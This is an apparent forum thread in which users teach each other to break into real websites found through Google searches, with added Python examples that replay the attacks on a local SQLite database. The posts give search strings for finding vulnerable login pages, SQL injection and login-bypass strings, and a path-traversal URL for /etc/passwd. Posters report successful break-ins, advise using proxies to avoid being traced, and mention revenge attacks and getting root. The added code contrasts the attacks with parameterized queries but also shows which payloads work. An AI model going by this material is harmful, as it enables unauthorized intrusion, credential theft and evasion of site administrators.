ComSec
1. Try searching for:

admin/logins.asp, or login.php, index.asp?query=, index.asp?id=, index.asp?page=, or adminphp

2. You won't be able to create a table from the URL, but if you get an error from the page it will show you paths to the password file, like "USER not found in HOME" etc. You can track each error output back to the admin password by including the paths in the URL. More details in the SQL injection tuts at my place.

3.
QUOTE
For example: http://www.whatever.com/index.asp?story=1'

Well, you could change the URL to say this:

For example: http://www.whatever.com/index.asp?query=....../../etc/passwd

That could get you the password file.

(The actual length is ../../../../../../../etc/passwd and not as shown above; that's how it turned out when posted.)

or http://www.whatever.com/Login.asp?id=' or 'x'='x or various other strings

for admin access.

Let me know how you get on.
OneNight
I am reading up on it all over the place and I know there are plenty of tuts on it over at comsec.governmentsecurity.com, yet still I am a little unclear on things.
Perhaps it's information overload that I am having. It's pretty late here so bear with me.

Anyways, here goes:

1. Finding vulnerable machines. What I am doing is using Google to search for strings like allinurl:index.asp?story= or allinurl:index.asp?forumid= etc. to try and get some hits on SQL servers for me to try and inject something.

2. Finding a few machines there, I proceed to try and create a few errors. My first step is to try and add a fictitious column. For example: http://www.whatever.com/index.asp?story=1 AND huh=1
With that I am hoping to return an error which will refer to something about an invalid column name. Sometimes I can get this.

3. For a next step I try to create an error using '. For example: http://www.whatever.com/index.asp?story=1'
Again trying to get an error, which sort of works sometimes also.

4. From here it gets a little fuzzy. I would think I need to do some database footprinting of some sort using the HAVING and GROUP BY commands. To this part I haven't gotten yet.

EDIT: I think I am getting somewhere. I am adding HAVING and GROUP BY until I am displaying the page error free...
/me is still struggling on

QUESTIONS:
a) Is there an easier way to find targetable machines?
b) Is footprinting the right way to go after that?
c) Anything else I should keep my eye out for?

I know that I must be taking a slow route but I don't really want to automate everything yet until I really understand what's going on.

I hope these questions aren't gonna waste anyone's time. In the mean time I will be going through the tutorials again for more research.

Thx for any help...
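The three probes OneNight describes (a valid id, a bogus column, a stray quote) can be reproduced offline. The following is an added example, not code from this thread; it assumes a hypothetical page that pastes the `story=` parameter straight into its SQL, uses an in-memory SQLite database in place of the site's database, and fills a constructed `stories` table. The HAVING/GROUP BY column-enumeration step is not shown, because it relies on MS SQL Server's error messages, which SQLite does not produce. The parameterized version beside it shows what the same probes look like when the value is bound as data.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stories (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO stories VALUES (?, ?)",
                     [(1, "first story"), (2, "second story")])
    return conn

def vulnerable_story(conn, story):
    # Hypothetical index.asp?story=... that pastes the parameter into the SQL.
    sql = "SELECT id, title FROM stories WHERE id=" + story
    return conn.execute(sql).fetchall()

def safe_story(conn, story):
    # Same lookup with a bound parameter: the value is data, never SQL.
    sql = "SELECT id, title FROM stories WHERE id=?"
    return conn.execute(sql, (story,)).fetchall()

def probe(lookup, conn, payload):
    """Classify what the page would show for one payload:
    'rows: N' for a normal response, 'error: ...' for a database error page."""
    try:
        rows = lookup(conn, payload)
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)
    return "rows: %d" % len(rows)

# The probes from the post, in the order they were tried, plus the
# boolean payload that confirms the injection once the errors show up.
PROBES = ["1", "1 AND huh=1", "1'", "1 OR 1=1"]

def probe_all(conn):
    """Run every probe against both versions of the page."""
    return {
        "vulnerable": {p: probe(vulnerable_story, conn, p) for p in PROBES},
        "safe": {p: probe(safe_story, conn, p) for p in PROBES},
    }

if __name__ == "__main__":
    for version, results in probe_all(make_db()).items():
        for payload, outcome in results.items():
            print("%-10s story=%-14r -> %s" % (version, payload, outcome))
```

On the concatenated query the bogus column gives `no such column: huh`, the stray quote gives a tokenizer error, and `1 OR 1=1` returns every row, which is exactly the progression the post describes. On the bound-parameter version none of the probes errors; the whole string is compared against the integer column and simply matches nothing, so there is no error page to read.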
>shortcut
In the login field: admin

In the password field: hi' or 'a'='a

I tried it and it worked on 2 out of 4 sites found on Google with login.asp in the URL.


*edited by me*

After going through some other login pages, a lot of guys definitely need to secure their databases...
atomix
Here's an SQL injection text.
OneNight
Thx for the reply guys.

Comsec, the ../../../../../ is that traversal bug, right? I thought that was only on older versions? I've not had any luck with it as yet.

BUT, just doing a search for inurl:admin/login.asp turned up a lot of good results. I then went the route of filling in:
Login: admin
Password: hi' or 'a'='a

And I got my first result! It hit me as a surprise. I was so dubious of it that I hadn't even bothered to fire up my Multiproxy. Suffice to say I was/am happy.

I think I'll try this way a little longer and hopefully turn up some more results.

QUESTIONS:
1) In the login field I can put in any name, right?
2) Is the key to it having plenty of injection strings to put in the pwd field? And then it will eventually work? Or is it more a case of hit and miss?
3) Is manipulating the URL directly with HAVING, UNION, GROUP BY etc. worth trying/getting the hang of?

>Shortcut, thx for spelling it out in layman's terms to me, indeed I got a few results already ;-)

Atomix, thx for the good txt. Good read.

Right, gonna get on with some more now.
w00dy
Congrats on your success!!

Word of advice though... even if you don't think it's gonna work, use a proxy. Let's suppose you try a few attempts at SQL injection without success, then remember you aren't using a proxy. Then you connect through a proxy and keep trying till it works. If you're an admin, and someone enters weird logins that don't work, then 5 min later someone breaks into the site through a proxy... he is likely to be smart enough to put 2 and 2 together.

Nowadays it is just a good idea in general to use a proxy due to the high volume of spyware, etc. Anonymity is a wonderful thing. Use it whenever possible.

ComSec
Onenight

QUOTE
QUESTIONS:
1) In the login field I can put in any name, right?
2) Is the key to it having plenty of injection strings to put in the pwd field? And then it will eventually work? Or is it more a case of hit and miss?
3) Is manipulating the URL directly with HAVING, UNION, GROUP BY etc. worth trying/getting the hang of?

-----------------------------------

(1) Yes, you can put anything in the login user, or leave it blank.

(2) Yes, the more strings you have, the better the odds to gain access.

(3) Messing with UNION tables is a bit more demanding and not ideal for newbies.

Well done on your first injection success... cool... hope you let the admin know their problem.

If you let me know what strings you're using, I might be able to add some more.

P.S. As woody said, always use proxies.

And thanks to Atomix for the paper... it all helps.
rayden5_
Hi,

since I am nearly at the same point as OneNight, please let me throw in one more question:

All tutorials I found so far are for MS SQL Server, so the "end query" -- and the UNION keyword will work there.

But how would you approach a MySQL injection? I tried many sites with more or less success, but since MySQL has slightly different syntax than MS SQL has, I e.g. don't know what a UNION-like keyword for MySQL is. Also, -- for ending a query won't work, as far as I know; /* (or */) will do?! GROUP BY will work on both, as far as I know?!

But I have a site in which I can inject a "LIMIT x,y" to get more records per page if I end this query with /* (or */)... but if I try to inject ANY other command there I always get "you have an error in your SQL blablabla"...

Other problems I have are with "select pass as username", which should give me the passwords instead of the usernames in the output list. I either get an SQL error too, or if I try to execute this as a 2nd query to overwrite the username var from the first query (with ; at the beginning) I don't get an error but also I don't get any output anymore. I think the problem is that only the output of the first record set is printed and my 2nd SQL query will return a 2nd record set which is never touched (just my thought).


If anyone can help me there or knows of a good MySQL tutorial, please let me know.

thx in advance
Ray
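The three problems in rayden5_'s post (where UNION fits, why nothing works after LIMIT, why a second query shows nothing) can be reproduced with an in-memory SQLite database. This is an added example, not code from the thread or from any site it mentions. It models two hypothetical pages, `list.php?id=` with the parameter pasted into the WHERE clause and `list.php?start=` with the parameter pasted after LIMIT, and fills a constructed `users` table. SQLite stands in for MySQL here; the behaviour shown (column names taken from the first SELECT of a UNION, LIMIT having to be the last clause, one statement per call) is the same in MySQL, though comment syntax differs: MySQL needs whitespace after `--` and also accepts `#` and `/* ... */`.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's MySQL tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn

def run(conn, sql):
    """Mimic a page that prints the first result set under the column names
    the query returns. Gives ('rows', names, rows) or ('error', message)."""
    try:
        cur = conn.execute(sql)
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return ("error", str(exc))
    names = [d[0] for d in cur.description]
    return ("rows", names, cur.fetchall())

def where_injection(conn, payload):
    # Hypothetical list.php?id=... pasted into the WHERE clause.
    return run(conn, "SELECT username FROM users WHERE id=" + payload)

def limit_injection(conn, payload):
    # Hypothetical list.php?start=... pasted after LIMIT (the "LIMIT x,y" case).
    return run(conn, "SELECT username FROM users LIMIT " + payload)

if __name__ == "__main__":
    conn = make_db()
    # 1. UNION in the WHERE clause. The header still reads "username" because
    #    column names come from the first SELECT, so no "AS username" alias
    #    is needed to make the passwords land in the username column.
    print(where_injection(conn, "0 UNION SELECT pass FROM users"))
    # 2. LIMIT x,y works as a paging knob (skip x rows, return up to y) ...
    print(limit_injection(conn, "1,5"))
    # 3. ... but LIMIT must be the last clause, so a UNION after it is a
    #    syntax error, which is the "error in your SQL" seen on that site.
    print(limit_injection(conn, "0,5 UNION SELECT pass FROM users"))
    # 4. A second, semicolon-separated statement is refused outright: the
    #    driver executes one statement per call, as PHP's mysql_query() does.
    print(where_injection(conn, "1; SELECT pass FROM users"))
```

The practical reading: put the UNION where a WHERE clause ends, not after LIMIT; leave the alias out, since the first SELECT already names the columns; and do not count on stacked queries through a driver that sends one statement per call.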
>shortcut
OneNight :

Yes, you can try these ones from the tutorial posted in a previous reply:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

anything ' --
anything " --


If you are not targeting one database in particular, then I suggest only trying the easy injections and moving on to the next page and so on... for practice and to help out admins. BUT if you want to penetrate a database (revenge or something) you might obviously try all the manipulation techniques you read about and USE A PROXY.

Good luck!
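The strings listed above, and the `' or 'x'='x` form ComSec gave earlier, can be checked against a login that builds its query by string concatenation. The following is an added example, not code from the thread; it uses an in-memory SQLite table with one constructed account and assumes two hypothetical query shapes, one with plain quoting and one that wraps the whole condition in parentheses. The double-quoted variants are left out because SQLite uses double quotes for identifiers, not string literals, so they would not model an application that quotes with `"`. The point it makes about the "hit and miss" question is that which string works depends on how the application quotes, not on luck, and that a parameterized query rejects all of them.

```python
import sqlite3

# Hypothetical query shapes a login page might build by string concatenation.
TEMPLATES = {
    "plain":  "SELECT username FROM users WHERE username='{u}' AND password='{p}'",
    "parens": "SELECT username FROM users WHERE (username='{u}' AND password='{p}')",
}

# (login field, password field) pairs taken from the list above; the last
# one puts the payload in the login field instead of the password field.
ATTEMPTS = [
    ("admin", "hi' or 1=1 --"),
    ("admin", "hi' or 'a'='a"),
    ("admin", "hi') or ('a'='a"),
    ("admin' --", "anything"),
]

def make_db():
    """Constructed sample data: one account whose password is never guessed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn

def vulnerable_login(conn, template, user, password):
    """True = logged in, False = rejected, None = the SQL error page."""
    sql = template.format(u=user, p=password)
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        return None

def safe_login(conn, user, password):
    """Bound parameters: the quotes in the payload are just characters."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None

def bypass_matrix(conn):
    """Which attempt gets past which query shape."""
    return {name: {attempt: vulnerable_login(conn, tpl, *attempt)
                   for attempt in ATTEMPTS}
            for name, tpl in TEMPLATES.items()}

if __name__ == "__main__":
    conn = make_db()
    for name, results in bypass_matrix(conn).items():
        for (user, pw), outcome in results.items():
            print("%-6s user=%-12r pass=%-18r -> %r" % (name, user, pw, outcome))
    for user, pw in ATTEMPTS:
        print("safe   user=%-12r pass=%-18r -> %r" % (user, pw, safe_login(conn, user, pw)))
```

Against the plain shape, `hi' or 1=1 --` and `hi' or 'a'='a` both log in and `admin' --` in the login field does too, while `hi') or ('a'='a` produces an unbalanced parenthesis and an error page. Against the parenthesized shape the `--` variants comment out the closing parenthesis and error, and `hi') or ('a'='a` is the one that fits. That is why a list of several shapes is worth carrying, and why an error page on one string is information rather than failure.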
OneNight
Yup, all the info you'll need to get you started and take you quite a way in SQL injection is right here in this site! Oh, and this one helped a lot also: http://www.securiteam.com/securityreviews/5DP0N1P76E.html.

It's nice to make progress in it but at the moment I am still just running along with the masses. Just making a massive search on Google and then picking off the sites that are wide open. I think I'll see if I can't delve into it any deeper to either:

1) actually pick a site to try and hack which doesn't have any obvious flaws.

2) get root access to the server on which the database is located.

I guess I'll be doing a lot more reading then.

I had some other stuff to write but I have forgotten what... nm...

Laters.
Invision Power Board © 2001-2005 Invision Power Services, Inc.